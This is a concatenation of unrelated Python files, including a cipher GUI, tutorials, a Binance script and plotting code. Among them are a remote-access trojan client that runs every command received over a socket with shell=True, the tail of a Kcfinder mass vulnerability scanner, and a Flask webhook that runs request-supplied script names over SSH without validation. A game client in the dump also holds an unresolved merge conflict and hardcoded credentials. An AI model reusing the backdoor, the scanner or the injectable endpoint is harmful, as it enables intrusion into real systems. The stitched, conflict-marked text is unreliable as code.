print(red+" - "+w+st+"/"+dork+c+" ---> "+w+"Kcfinder"+red+" NO!"+w)
except Exception as e:
pass
print(red+" - "+w+st+"/"+dork+c+" ---> "+w+"Kcfinder"+red+" NO!"+w)
site = input(green+" [+] Enter You Site List: "+la7mar)
th = input(green+" [+] How Many Speed: "+la7mar)
try:
opn = open(site,"r").readlines()
except:
print(la7mar+"\n\n [!] Failed To Open List")
quit()
try:
mkdir("result")
except:
pass
try:
with concurrent.futures.ThreadPoolExecutor(int(th)) as executor:
executor.map(scan,opn)
except Exception as e:
print(e)
print(green+" [+] All Site Scanned Successful [+]") |
from fractions import Fraction
a = Fraction(5, 4)
b = Fraction(7, 16)
print a + b
print a * b
c = a * b
print c.numerator
print c.denominator
print float(c)
print c.limit_denominator(8)
x = 3.75
y = Fraction(*x.as_integer_ratio())
print y |
from clientpy3 import *
import time
import random
import math
def status_parser(status):
try:
tokens = status[0]
except (IndexError):
return
tokens = status.split(' ')
# print(tokens)
data = {}
data['position'] = (tokens[1],tokens[2])
data['velocity'] = (tokens[3],tokens[4])
num_mines = int(tokens[7])
data['num_mines'] = num_mines
data['mines'] = [tokens[7+3*i+1:7+3*i+4] for i in range(num_mines)]
pinfo_start = 7+3*num_mines+2
num_players = int(tokens[pinfo_start])
data['num_players'] = num_players
data['players'] = [tokens[pinfo_start+4*i+1:pinfo_start+4*i+5] for i in range(num_players)]
binfo_start = pinfo_start+4*num_players+2
num_bombs = int(tokens[binfo_start])
data['num_bombs'] = num_bombs
data['bombs'] = [tokens[binfo_start+3*i+1:binfo_start+3*i+4] for i in range(num_bombs)]
winfo_start = binfo_start+3*num_bombs+2
num_wormholes = int(tokens[winfo_start])
data['num_wormholes'] = num_wormholes
data['wormholes'] = [tokens[winfo_start+5*i+1:winfo_start+5*i+6] for i in range(num_wormholes)]
return data
def config_parser(config):
try:
tokens = config[0]
except (IndexError):
return
#print (type(tokens))
tokens = tokens.split(' ')
data = {}
data['MAP_WIDTH'] = float(tokens[2])
data['MAP_HEIGHT'] = float(tokens[4])
data['CAPTURERADIUS'] = float(tokens[6])
data['VISIONRADIUS'] = float(tokens[8])
data['FRICTION'] = float(tokens[10])
data['BRAKEFRICTION'] = float(tokens[12])
data['BOMBPLACERADIUS'] = float(tokens[14])
data['BOMBEFFECTRADIUS'] = float(tokens[16])
data['BOMBDELAY'] = float(tokens[18])
data['BOMBPOWER'] = float(tokens[20])
data['SCANRADIUS'] = float(tokens[22])
data['SCANDELAY'] = float(tokens[24])
return data
def scan_parser(scan_data):
if (scan_data == ['ERROR Scanning too soon']):
return
try:
tokens = scan_data[0]
except (IndexError):
return
tokens = tokens.split(' ')
data = {}
# print(tokens)
num_mines = int(tokens[3])
data['mines'] = [tokens[3+3*i+1:3+3*i+4] for i in range(num_mines)]
pinfo_start = 3+3*num_mines+2
num_players = int(tokens[pinfo_start])
data['num_players'] = num_players
data['players'] = [tokens[pinfo_start+4*i+1:pinfo_start+4*i+5] for i in range(num_players)]
binfo_start = pinfo_start+4*num_players+2
num_bombs = int(tokens[binfo_start])
data['num_bombs'] = num_bombs
data['bombs'] = [tokens[binfo_start+3*i+1:binfo_start+3*i+4] for i in range(num_bombs)]
winfo_start = binfo_start+3*num_bombs+2
num_wormholes = int(tokens[winfo_start])
data['num_wormholes'] = num_wormholes
data['wormholes'] = [tokens[winfo_start+5*i+1:winfo_start+5*i+6] for i in range(num_wormholes)]
return data
def status(user,password):
try:
status = get_status(user,password)
return status_parser(status[0])
except (IndexError, TimeoutError):
return
def move(user, password, angle, velocity):
angle = str(angle)
velocity = str(velocity)
run(user,password,'ACCELERATE '+angle+' '+velocity)
return
def brake(user, password):
run(user, password,'BRAKE')
return
def scan(user, password, data, dic):
<<<<<<< HEAD
user_x = data['position'][0]
user_y = data['position'][1]
randx = random.randint(0,dic['MAP_WIDTH'])
randy = random.randint(0,dic['MAP_WIDTH'])
scan_x = str(math.floor((randx) % dic['MAP_WIDTH']))
scan_y = str(math.floor((randy) % dic['MAP_WIDTH']))
#print('scanning: ', scan_x, scan_y)
return get_scan(user, password, scan_x, scan_y)
if __name__ == '__main__':
u = 'BSOD'
p = 'Alboucai'
while True:
move(u,p,3.14/2,0.25+0.25)
print(status(u,p))
time.sleep(2)
=======
user_x = data['position'][0]
user_y = data['position'][1]
#randx = random.randint(0,dic['MAP_WIDTH'])
#randy = random.randint(0,dic['MAP_WIDTH'])
status = get_status('BSOD', 'Alboucai')
data2 = utils.status_parser(status[0])
current_x = data2['position'][0]
current_y = data2['position'][1]
xvec = float(current_x) - float(user_x)
print(xvec)
yvec = float(current_y) - float(user_y)
print(yvec)
scan_x = str(math.floor((float(user_x) + 10*xvec) % dic['MAP_WIDTH']))
scan_y = str(math.floor((float(user_y) + 10*yvec) % dic['MAP_WIDTH']))
#print('scanning: ', scan_x, scan_y)
return get_scan(user, password, scan_x, scan_y)
if __name__ == '__main__':
u = 'BSOD'
p = 'Alboucai'
while True:
move(u,p,3.14/2,0.25+0.25)
print(status(u,p))
time.sleep(2)
>>>>>>> b9345a37a0dd213b93d50884f5a3b886ca9496a5
|
#!/usr/bin/python
import sys
from PyQt5 import QtCore, QtGui, QtWidgets,uic
from sympy import mod_inverse #for optimized mod_inverse
import sys
#Import code generated by pyqt5 designer
#pyuic5 *.ui -o *.py
from Ciphers import Ui_MainWindow
class Ui(QtWidgets.QMainWindow):
global firstRun # Described where I use it
firstRun = True
def __init__(self):
#Initiates the UI designed in Qt5 Designer
super(Ui, self).__init__()
self.ui = Ui_MainWindow()
self.ui.setupUi(self)
self.show()
# Change the text in the CipherText Field when PlainText/Key/Encryption Mode is changed
self.ui.codewordInput.textChanged.connect(self.Encrypt)
self.ui.keyInput.textChanged.connect(self.Encrypt)
self.ui.decryptBool.toggled.connect(self.Encrypt)
self.ui.encryptionCipher.currentIndexChanged.connect(self.Encrypt)
# Initates the log and moves the CipherText to the PlainText field
self.ui.encodeButton.clicked.connect(self.Btn)
def Btn(self):
global firstRun
word = self.ui.codewordInput.toPlainText() #Gets PlainText as a String
key = self.ui.keyInput.toPlainText() #Gets Key as a String
encryptionType = str(self.ui.encryptionCipher.currentText()) #Gets Encryption Type as a String
output = self.ui.outputInput.toPlainText() #Gets CipherText as a String
if firstRun:
#Creates or overwrites old Log if the button was pressed for the first time
log = open("log.txt","w+",encoding='utf-8')
log.write('Codeword:'+str(word)+' Cipher:'+str(encryptionType)+' Key :\''+str(key)+'\' ---> \''+str(output)+'\'')
firstRun = False
else:
# Adds the next sequential cipher to the Log
log = open("log.txt","a",encoding='utf-8')
log.write(('------> Cipher:'+str(encryptionType)+' Key\'' +str(key)+'\' ---> \''+str(output)+'\''))
log.close()
self.ui.codewordInput.setText(output)
self.Encrypt()
#Copies the output to system clipboard if the user want to
if self.ui.copyBool.isChecked():
#stolen from stackoverflow.com/questions/1073550/pyqt-clipboard-doesnt-copy-to-system-clipboard
clipboard = QtWidgets.QApplication.clipboard()
clipboard.setText(output)
event = QtCore.QEvent(QtCore.QEvent.Clipboard)
app.sendEvent(clipboard, event)
def Encrypt(self):
word = self.ui.codewordInput.toPlainText()
key = self.ui.keyInput.toPlainText()
EncryptMode = False if self.ui.decryptBool.isChecked() else True #Check if the user want to encrypt or decrypt
if self.ui.encryptionCipher.currentIndex() == 0 and key.isnumeric(): #Index 0 is Ceaser shift
output = self.ceaserShift(word,key,EncryptMode)
self.ui.outputInput.setText(output)
elif self.ui.encryptionCipher.currentIndex() == 1 and key.isalpha(): #Index 1 is Vigenere Cipher
output = self.Vigenere(key,EncryptMode)
self.ui.outputInput.setText(output)
elif self.ui.encryptionCipher.currentIndex() == 2 and key.isnumeric(): #Index 2 is Multiplicative Cipher
output = self.Multipicative(word,key,EncryptMode)
self.ui.outputInput.setText(output)
elif self.ui.encryptionCipher.currentIndex() == 3 and key != '': #Index 3 is Affine Cipher
try: # A little hacky coding
mulKey,addKey = tuple(key.split(","))
output = self.Affine(word,mulKey,addKey,EncryptMode)
self.ui.outputInput.setText(output)
except:
print('INVALID FORMAT')
elif self.ui.encryptionCipher.currentIndex() == 4 and key != '': #Index 4 is Rail Fence Cipher
output = self.railFence(word,key,EncryptMode)
self.ui.outputInput.setText(output)
def storeCase(self,Word):
#Just returns a List containing the original case of PlainText
Lst = []
for i in range(len(Word)):
if Word[i].isupper():
Lst.append(True)
else:
Lst.append(False)
return Lst
def restoreCase(self,Word,codeCase):
#Restores the case of the CipherText
newWord = ""
for i in range(len(Word)):
if codeCase[i]:
newWord =newWord + Word[i].upper()
else:
newWord =newWord + Word[i]
return(newWord)
def ceaserShift(self,word,key,EncryptMode):
key = int(key) if EncryptMode else -int(key) # Key is subtracted while Decrypting
codeCase = self.storeCase(word)
word = word.lower()
outputASCII = [] #Empty list to store the positional values of characters
for letter in word:
if letter.isalpha():
outputASCII.append(ord(letter)-97) #Since the plaintext is in lowercase we just subtract 97 which is the ordinal value of 'a'
else:
outputASCII.append(ord(letter)) #Special Characters are ignored
for i in range(len(outputASCII)):
if outputASCII[i] < 0 or outputASCII[i] > 25: #Special Characters are ignored
continue
outputASCII[i] = (outputASCII[i] + int(key))%26 + 97
if outputASCII[i] < 0: # Can happen during decryption
outputASCII[i] = 26 - outputASCII[i] + 97
Output =''.join(chr(i) for i in outputASCII) #Essentially the same as Output = Output + chr(i) inside a for loop, but faster and easier to understand
Output = self.restoreCase(Output,codeCase)
return Output
def Vigenere(self,key,EncryptMode):
word = self.ui.codewordInput.toPlainText()
codeCase = self.storeCase(word)
word = word.lower()
key = key.lower()
output = ""
Blanks = 0
while(len(key)<len(word)): #We just need the key to be longer than the plaintext
key = key + key
for i in range(len(word)):
if word[i].isalpha():
if EncryptMode:
ciph = (ord(word[i])+ord(key[i-Blanks])-194)%26 # 97+97 = 194
else:
ciph = ((ord(word[i]) - ord(key[i]) + 26) % 26)
output = output + chr(ciph+97)
else:
output += word[i]
Blanks = Blanks + 1
output = self.restoreCase(output,codeCase)
return output
def Multipicative(self,word,key,EncryptMode):
# Just breaks when mod inverse doesn't exist
key = int(key) if EncryptMode == 1 else mod_inverse(int(key),26)
codeCase = self.storeCase(word)
word = word.lower()
outputASCII = []
for letter in word:
if letter.isalpha():
outputASCII.append(ord(letter)-97)
else:
outputASCII.append(ord(letter))
for i in range(len(outputASCII)):
if outputASCII[i] < 0 or outputASCII[i] > 25:
continue
try:
outputASCII[i] = int((outputASCII[i] * int(key))%26) + 97
except:
return 'Key doesn\'t have a mod inverse'
output =''.join(chr(i) for i in outputASCII)
output = self.restoreCase(output,codeCase)
return output
def Affine(self,word,mulKey,addKey,EncryptMode):
# Just breaks when mod inverse doesn't exist
codeCase = self.storeCase(word)
word = word.lower()
outputASCII = []
mulKey = int(mulKey)
addKey = int(addKey)
for letter in word:
if letter.isalpha():
outputASCII.append(ord(letter)-97)
else:
outputASCII.append(ord(letter))
for i in range(len(outputASCII)):
if outputASCII[i] < 0 or outputASCII[i] > 25:
continue
if EncryptMode:
outputASCII[i] = ((outputASCII[i] * int(mulKey))+addKey)%26 + 97
else:
try:
outputASCII[i] = ((outputASCII[i] - addKey) * int((mod_inverse(mulKey,26))))%26 + 97
except:
return 'Key doesn\'t have a mod inverse'
output =''.join(chr(i) for i in outputASCII)
output = self.restoreCase(output,codeCase)
return output
def railFence(self,word,key,EncryptMode):
#Adapted from https://www.geeksforgeeks.org/rail-fence-cipher-encryption-decryption/
key = int(key)
rail = [['' for i in range(len(word))] for ii in range(key)] #initate empty Grid
dirDown = False
row, col = 0, 0
output = []
index = 0
if EncryptMode:
for i in range(len(word)):
if (row == 0) or (row == key - 1):
dirDown = not dirDown
rail[row][col] = word[i]
col += 1
if dirDown:
row += 1
else:
row -= 1
output = []
for i in range(key):
for j in range(len(word)):
if rail[i][j] != '':
output.append(rail[i][j])
return("" . join(output))
else:
for i in range(len(word)):
if row == 0:
dirDown = True
if row == key - 1:
dirDown = False
rail[row][col] = '*'
col += 1
if dirDown:
row += 1
else:
row -= 1
for i in range(key):
for j in range(len(word)):
if (rail[i][j] == '*' and index < len(word)):
rail[i][j] = word[index]
index += 1
for i in range(len(word)):
if row == 0:
dirDown = True
if row == key-1:
dirDown = False
if (rail[row][col] != '*'):
output.append(rail[row][col])
col += 1
if dirDown:
row += 1
else:
row -= 1
return("".join(output))
#to make the PyQt5 window
app = QtWidgets.QApplication(sys.argv)
window = Ui()
app.exec_() |
def joke():
return (u'''I'm fed up with kleptomaniacs... '''
u'They take everything literally')
|
#REPASO DE CONCEPTOS BÁSICOS
'''
numeros = [1, 2, 3, 4, 5]
print(numeros)
primera_posicion = numeros[0]
longitud = len(numeros)
print(f"El primer valor es: {primera_posicion}\nLa longitud de la lista es: {longitud}")
#ITERAR SOBRE UNA LISTA
for num in numeros:
print(num)
'''
'''
#INDEXADO Y SUBLISTAS
lista = ["El", "futur", "rei", "dels", "piratas"]
print(lista)
ultima_posicion = lista[-1]
print(ultima_posicion)
penultima_posicion = lista[-2]
print(penultima_posicion)
sublista = lista[1:5] #paramos en 5-1 = 4
print(sublista)
sublista = lista[:5]
print(sublista)
sublista = lista[1:]
print(sublista)
sublista = lista[-4:-1]
print(sublista)
'''
'''
#COMPROVAR SI UNA LISTA CONTIENE O NO UN ELEMENTO
lista = ["El", "futur", "rei", "dels", "piratas"]
palabra = "rei"
palabra_dos = "barbablanca"
if palabra in lista:
print(f"La palabra '{palabra}' pertenece a la lista")
if palabra_dos not in lista:
print(f"La palabra '{palabra_dos}' no está en la lista")
'''
'''
#MODIFICAR ELEMENTOS DE UNA LISTA
lenguajes = ["Python", "JavaScript", "C", "Java", "Kotlin", "Ruby", "SQL"]
print(lenguajes)
lenguajes[3] = "Angular"
print(lenguajes)
lenguajes[2] = lenguajes[2] + "++"
print(lenguajes)
lenguajes[2:4] = ["C#", "Laravel"]
print(lenguajes)
lenguajes[4:5] = ["PHP", "React", "Vue"]
print(lenguajes)
'''
'''
#METODOS DE LISTAS: AÑADIR ELEMENTOS
lenguajes = ["Python", "JavaScript", "C", "Java", "Kotlin", "Ruby", "SQL"]
print(lenguajes)
#INSERT()
lenguajes.insert(1, "C++")
print(lenguajes)
#APPEND()
lenguajes.append("C#") #agrega alfinal de la lista
print(lenguajes)
#EXTEND()
frutas = ["Fresa", "Peras", "Uvas"]
print(frutas)
frutas_extra = ["Mango", "Manzana", "Platano"]
frutas.extend(frutas_extra)
print(frutas)
print(frutas_extra)
'''
'''
#METODOS DE LISTAS: ELIMINAR ELEMENTOS
frutas = ["Mango", "Manzana", "Plátano", "Kiwi", "Melocotón", "Cereza"]
print(frutas)
#POP() -> me elimina y retorna el elemento eliminado
frutas.pop() #si no le paso ningun indice, me elimina el ultimo elemento
print(frutas)
frutaEliminada = frutas.pop(0)
print(frutas)
print(frutaEliminada)
#REMOVE()
frutas.remove("Melocotón")
print(frutas)
#DEL
del frutas[0]
print(frutas)
indice = frutas.index("Plátano")
print(indice)
'''
'''
#CONVERTIR UN TEXTO EN LISTA
texto = "Hola que tal"
lista_palabras = (texto.split())
print(lista_palabras)
'''
'''
ENUNCIADO: TENEMOS UN TEXTO DÓNDE QUEREMOS ENCONTRAR PALABRAS CLAVE.
LAS PALABRAS CLAVE PUEDEN SER HASTA 5 Y DEBEREMOS PEDÍRSELAS AL USUARIO
Y GUARDARLAS EN UNA LISTA. SI EL USUARIO QUIERE PONER MENOS DE 5 PALABRAS CLAVE,
EBERÁ ESCRIBIR "FIN" PARA TERMINAR DE INTRODUCIR DATOS. SI EL USUARIO INTRODUCE
NÚMEROS O NADA, DEBEREMOS ELIMINARLOS DE LA LISTA ANTES DE LA BÚSQUEDA.
EN OTRA LISTA, DEBEREMOS GUARDAR EL NÚMERO DE VECES QUE APARECE CADA
PALABRA CLAVE EN NUESTRO TEXTO. POR EJEMPLO, SI LAS PALABRAS CLAVE SON
ORDENADOR Y PORTÁTIL Y APARECEN 5 Y 7 VECES RESPECTIVAMENTE, NUESTRAS LISTAS
DEBERÍAN SER ASÍ:
- KEYWORDS = ["ORDENADOR", "PORTÁTIL"]
- OCURRENCIAS = [5, 7]
'''
texto = """"Seguramente hayas notado que tu productividad ha bajado desde que trabajas desde casa.
Es muy importante que logremos teletrabajar efectivamente y de manera autorregulada.
Esto se traduce en finalizar antes nuestras tareas y evitar jornadas laborales interminables.
El primer consejo y uno de los más importantes ya te lo he dado en el apartado anterior.
Tenemos que construir un espacio de trabajo en el que nos sintamos cómodos y dispongamos de todas las herramientas necesarias para teletrabajar.
En la medida de lo posible, es importante teletrabajar siempre en el mismo lugar.
De esta forma, nuestro cerebro asocia el sitio con la acción de trabajar y nos hará estar más focalizados en nuestras tareas."""
keywords = []
keywords_repeat = []
for x in range(5):
keyword = input("Introduce una palabra clave o 'fin' para terminar: ")
if keyword == 'fin':
break
else:
keywords.append(keyword)
print(keywords)
posicion = 0
while(True):
if posicion >= len(keywords):
break
if keywords[posicion] == '': #EMPTY
keywords.pop(posicion)
elif keywords[posicion].isnumeric():
keywords.pop(posicion)
else:
posicion +=1
print("Lista de keywords corregida")
print(keywords)
texto = texto.replace('.', '').replace(',', '').split()
longitud_keywords = len(keywords)
for x in range(longitud_keywords):
keywords_repeat.append(0)
for palabra in texto:
for keyword in keywords:
if keyword == palabra:
pos = keywords.index(keyword)
keywords_repeat[pos] += 1
break
print(keywords_repeat) |
'''
输出九九乘法表
'''
def lower_triangle(): #下三角输出
for i in range(1,10):
for j in range(1,i+1):
print("%d*%d=%d"%(i,j,i*j),end="\t")
print()
def upper_triangle(): #上三角输出
for i in range(1,10):
for t in range(2,i+1):
print("\t",end="")
for j in range(i,10):
print("%d*%d=%d"%(i,j,i*j),end="\t")
print()
if __name__=="__main__": #程序主入口
upper_triangle()
#lower_triangle() |
import pandas as pd
from binance import Client, ThreadedWebsocketManager, ThreadedDepthCacheManager
import sys
sys.path.insert(1, '/home/marcon/Documents/exchange/')
import config
# Authenticate
client = Client(config.API_KEY, config.API_SECRET)
# Get Tickers
tickers = client.get_all_tickers()
ticker_df = pd.DataFrame(tickers)
ticker_df.set_index('symbol', inplace=True)
ticker_df.head()
ticker_df.tail()
ticker_df.loc['BTCUSDT']
# Market Depth
depth = client.get_order_book(symbol='BTCUSDT')
depth_df = pd.DataFrame(depth['bids'])
depth_df.columns = ['Price', 'Volume']
depth_df.head()
# Get Historical Data
historical = client.get_historical_klines('BTCUSDT',Client.KLINE_INTERVAL_1DAY, '1 Jan 2011')
historical
hist_df = pd.DataFrame(historical)
hist_df.columns = ['Open Time','Open','High','Low','Close','Volume','Close Time','Quote Asset Volume',
'Number of Trades','TB Base Volume','TB Quote Volume','Ignore']
hist_df.head()
# Preprocess Historical Data
hist_df.dtypes
hist_df['Open Time'] = pd.to_datetime(hist_df['Open Time']/1000, unit = 's')
hist_df['Close Time'] = pd.to_datetime(hist_df['Close Time']/1000, unit = 's')
numeric_columns = ['Open','High','Low','Close','Volume','Quote Asset Volume','TB Base Volume','TB Quote Volume']
hist_df[numeric_columns] = hist_df[numeric_columns].apply(pd.to_numeric, axis=1)
hist_df.head()
hist_df.tail()
hist_df.describe()
hist_df.info()
# Viz
import mplfinance as mpf
mpf.plot(hist_df.set_index('Close Time').tail(100))
mpf.plot(hist_df.set_index('Close Time').tail(100), type = 'candle',style='charles')
mpf.plot(hist_df.set_index('Close Time').tail(100), type = 'candle',style='charles',volume=True)
mpf.plot(hist_df.set_index('Close Time').tail(120), type = 'candle',style='charles',volume=True,
title = 'BTCUSDT Last 120 Days', mav = (10,20,30))
|
from flask import Flask, request, make_response
import logging
from logging.handlers import RotatingFileHandler
import paramiko
from config import Config
import requests
import os
BASEPATH = os.path.abspath(os.path.dirname(__file__))
print('BASE', BASEPATH)
def check_dir(dir):
print('check_dir:', dir)
if not dir:
return False
if isinstance(dir, list):
print('is list', dir)
result = False
for item in dir:
result = check_dir(item)
if not result:
break
return result
elif isinstance(dir, str):
print('is string', dir)
dir = ''.join([BASEPATH,'/', dir])
try:
if not os.path.exists(dir):
os.mkdir(dir)
except BaseException as exp:
print('error create file:', exp)
return False
return True
else:
return False
dirs = ['config', 'keys', 'logs']
check_dir(dirs)
strfmt = '%(asctime)s %(thread)d %(name)s [%(levelname)s] %(funcName)s: %(message)s'
logging.basicConfig(filename=f'{BASEPATH}/logs/wh.log', level=logging.DEBUG, format=strfmt)
handler = RotatingFileHandler(f'{BASEPATH}/logs/wh.log', maxBytes=10000000, backupCount=1)
handler.setLevel(logging.DEBUG)
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(
paramiko.AutoAddPolicy())
app = Flask(__name__)
app.logger.addHandler(handler)
def readconfig():
config = dict(host='localhost', user='noboby', path='/tmp', fromuser='', sudo='/usr/bin/sudo', port='22',
sshkey='key')
config = Config(BASEPATH).get_config()
if not config['port']:
config['port'] = 22
return config
config = readconfig()
app.logger.info(config)
ssh_key = paramiko.RSAKey.from_private_key_file(f"{BASEPATH}/keys/{config['sshkey']}")
@app.route('/')
def hello_world():
app.logger.info('hello_world page')
return 'Hello World!'
def create_ticket(data):
'''
:param data:
:return:
POST /api/v1/tickets
{
"title": "Help me!",
"group": "Users",
"customer": "email_of_existing_customer@example.com",
"article": {
"subject": "some subject",
"body": "some message",
"type": "note",
"internal": false
},
"note": "some note",
...
}
'''
if data['state'].lower() != 'alerting':
return False
query = f"{Config().get_url(config)}api/v1/tickets"
create_json = {
"title": data['title'][:40],
"group": "Users",
"customer": config['zammad']['customer_email'],
"state_id": 1,
"article": {
"subject": data['title'][:40],
"body": data['message'],
"type": "note",
"internal": False,
"sender": "Customer",
},
"note": data['message']}
print('URL:', query)
print(create_json)
# Authorization: Token token=
headers = {
'Authorization': f"Token token={config['zammad']['token']}"
}
print(headers)
exception = False
try:
responce = requests.post(query, headers=headers, json=create_json)
app.logger.info(f'result create ticket: {responce.status_code}')
'''try:
print( responce.status_code)
if responce.status_code == 201:
if isinstance(responce.json(), dict):
ticket = responce.json()
print(ticket)
return dict(id=ticket['id'],
number=ticket['number'],
title=ticket['title'],
tmplbeeline=ticket['tmpbeeline'],
tmplmegafon=ticket['tmplmegafone'])
except BaseException as exp:
print('Error create user: ', exp)
logging.error('Error create user: ' + str(exp))'''
text = ''
if responce.status_code >= 400:
text = f'<h2>{responce.status_code} Error</h2>'
except ConnectionError as exp:
app.logger.error(f'Connection error: {exp}')
return {'message': '502 Server Connection Error', 'code': 502}
except TimeoutError as exp:
app.logger.error(f'Timeout error: {exp}')
return {'message': '408 Request Timeout Error', 'code': 408}
except request.ro as exp:
app.logger.error(f'BaseException error: {exp}')
return {'message': '500 Server Error', 'code': 500}
return {'message': text, 'code': responce.status_code}
@app.route('/catchwh/<string:script>', methods=['GET'])
def catchwhget(script):
app.logger.info(script)
return call_script(script)
@app.route('/catchwh/', methods=['POST', 'GET'])
def catchwh():
app.logger.info(f"method: {request.method}")
result = dict()
if request.method == 'POST':
script = None
data = None
if request.is_json:
data = request.get_json()
app.logger.info(str(data))
if 'tags' in data:
if 'script' in data['tags']:
script = data['tags']['script']
else:
script = request.form.get('script')
data = request.form.to_dict()
if script:
app.logger.info(f"get via POST: {script}")
result = call_script(script)
else:
result = create_ticket(data)
else:
script = request.args.get('script')
app.logger.info(f"args: {request.args}, {script}")
if script:
app.logger.info(f"get via GET: {script}")
result = call_script(script)
response = make_response(result['message'], int(result['code']))
response.headers["Content-Type"] = "application/json"
return response
def check_errors(stdout, stderr):
out = ''
error = ''
error_code = 500
len_out = 0
len_err = 0
if isinstance(stdout, int) or isinstance(stderr, int):
return dict(result=error_code, error='Exec exception')
for line in stdout:
out += line.strip('\n')
len_out = 1
for line in stderr:
error += line.strip('\n')
len_err = 1
if len_out > 0:
app.logger.info(f'OUT: {out}')
if out.upper().rstrip() == 'OK':
error_code = 200
error = 'OK'
if len_err > 0:
if 'No such file or directory' in error:
error = 'Script error'
return dict(code=error_code, message=error)
def call_script(script):
app.logger.info(script)
call_arr = []
# call_arr = [{config['sudo']}, 'ssh', f"{config['user']}@{config['host']}", f"{config['path']}{script}"]
# if config['fromuser'] and config['fromuser']!='':
# call_arr = ['/usr/bin/sudo', '-u', f"{config['fromuser']}", 'ssh', f"{config['user']}@{config['host']}", f"{config['path']}{script}"]
app.logger.info(str(call_arr))
# result = subprocess.call(call_arr)
stdin, stdout, stderr = (555, 555, 555)
app.logger.info(f"try to connect... hostname={config['host']}, username={config['user']}, port={config['port']}")
try:
ssh.connect(hostname=config['host'], username=config['user'], port=config['port'], pkey=ssh_key)
app.logger.info(f"try exec command: {config['path']}{script}")
stdin, stdout, stderr = ssh.exec_command(f"{config['path']}{script}")
except paramiko.PasswordRequiredException as exp:
app.logger.error(f'password required: {exp}')
except paramiko.BadAuthenticationType as exp:
app.logger.error(f'bad auth type: {exp}')
except paramiko.BadHostKeyException as exp:
app.logger.error(f'bad host key: {exp}')
except paramiko.AuthenticationException as exp:
app.logger.error(f'auth exception: {exp}')
except paramiko.SSHException as exp:
app.logger.error(f'core ssh exception: {exp}')
except Exception as exp:
app.logger.error(f'pure exception: {exp}')
return check_errors(stdout, stderr) # {'result':stdout, 'error': stderr}
if __name__ == '__main__':
app.logger.info('run app on 0.0.0.0:5000')
app.run(host='0.0.0.0')
|
import socket
import subprocess
import time
import os
host = '127.0.0.1'
port = 52918
password = '' #soon askfor password
#issue : security
#-solution : add password with hashing base64/md5 to matching server password if timeout 3/5 second without password then DIE
#-solution : send header to matching the rat client not accessed from telnet
#function for run the remote task and send back to server
def action():
cmd = server_conn.recv(1024)
cmd = cmd.decode()
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
stdout_value = proc.stdout.read() + proc.stderr.read()
if(stdout_value == b''):
server_conn.send(b'Done.')
else:
server_conn.send(stdout_value)
#unlimited loop action
while(1):
try:
server_conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_conn.connect((host, port))
print("[*] Connected")
#loop when get message from server then call function at function action
while 1:
try:
msg = b''
action()
except socket.error:
print("[-] Connection error...")
break
print("[-] Session Closed")
server_conn.close()
time.sleep(3)
print("[*] Reconnecting to the server")
except socket.error:
print("[-] Can't reach the server...")
time.sleep(3)
|
#!/usr/bin/python
'''
plot_log in DeepGeom
author : cfeng
created : 1/31/18 7:49 AM
'''
import os
import sys
import glob
import time
import argparse
import numpy as np
from matplotlib import pyplot as plt
from utils import TrainTestMonitor as TTMon
#from Tkinter import Tk
#import tkFileDialog
def main(args):
'''
if not os.path.exists(args.log_dir):
tkroot = Tk()
tkroot.withdraw()
args.log_dir = tkFileDialog.askdirectory(title='select log folder', initialdir='../logs', mustexist=True)
tkroot.destroy()
assert(os.path.exists(args.log_dir))
ttm = TTMon(args.log_dir,plot_extra=args.plot_extra!=0)
plt.show()
'''
test = np.load(args.log_dir + 'iter_loss.npy')
train_running = np.load(args.log_dir + 'stats_train_running.npz')
plt.plot(test["iter_loss"][:,1])
plt.show()
plt.plot(train_running["iter_loss"][:,1])
plt.show()
if __name__ == '__main__':
parser = argparse.ArgumentParser(sys.argv[0])
parser.add_argument('-d','--log_dir',type=str, default='', help='log folder')
parser.add_argument('-e','--plot_extra',type=int, default=0, help='plot training accuracy and test loss')
args = parser.parse_args(sys.argv[1:])
args.script_folder = os.path.dirname(os.path.abspath(__file__))
main(args)
|
import Tkinter, tkFileDialog
import numpy as np
import scipy.integrate as integrate
import matplotlib.pyplot as plt
filepath = 'G:\My Drive\Lab\UIUC EPR Data\Day 2\T1\data_fit_stretchedInvRec2\\temp_dep_stretched.txt'
if filepath == '':
root = Tkinter.Tk()
root.withdraw()
filepath = tkFileDialog.askopenfilename()
def J8(y): #function definitions
return integrate.quad(lambda x: (x**8)*
(np.e**(x)/((np.e**(x)-1)**2)), 0, y)
def direct_process(x, a):
return a * x
def raman_process(x, b, theta):
return b * (((x/theta)**9) * J8(theta/x)[0])
def local_modes(x, c, delta):
return c * np.e**(delta/x)/((np.e**(delta/x)-1)**2)
def fitfunc(T, a, b, c, d, e): #a = dir, b = ram, c = loc, d = delta, e = theta
y = direct_process(T, a) + raman_process(T, b, e) + local_modes(T, c, d)
return y
vfitfunc = np.vectorize(fitfunc) #scipy.integrate and scipy.optimize.curve_fit don't play nicely if it isn't vectorized
vraman = np.vectorize(raman_process)
#vreg_fitfunc = np.vectorize(reg_fitfunc)
#################################################################
# parameters
#################################################################
direct = 10.5
raman = 1000000
local = 10**4
delta = 300
theta = 160
#################################################################
#
#################################################################
params = np.array([direct, raman, local, delta, theta])
#bnds = [(d_lower, r_lower, l_lower, dta_lower, t_lower),(d_upper, r_upper, l_upper, dta_upper, t_upper)]
a = np.loadtxt(filepath, delimiter=',')
#print a
T = a[:,0]
y = np.log10(1/(a[:,1]/10**9))
print a[:,1]
print y
reg_y = 1/a[:,1]
print reg_y
#print T, y
#popt, pcov = scipy.optimize.curve_fit(vfitfunc, T , y, params, bounds = bnds, gtol = 1e-15, max_nfev = 10000)
#perr = np.sqrt(np.diag(pcov))
#direct, raman, local, delta, theta = popt
#d_err, r_err, l_err, dta_err, th_err = perr
plt.plot(T, y, 'go', T, np.log10(vfitfunc(T , params[0], params[1], params[2], params[3], params[4])), 'r--',
T, np.log10(direct_process(T , params[0])), 'b--',
T, np.log10(vraman(T , params[1], params[4])), 'c--',
T, np.log10(local_modes(T , params[2], params[3])), 'm--'
)
plt.gca().set_ylim(bottom=0, top=np.amax(y)+1)
plt.show() |
#!/usr/bin/env python
"""
Package specific script that 'builds' the package content as part of the
publish process.
Usage: build <pkgroot>
Returns: If the build is succesful, then the script returns '0'; else
a non-zero value is returned.
"""
#------------------------------------------------------------------------------
# Begin the build process
print "Building...."
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
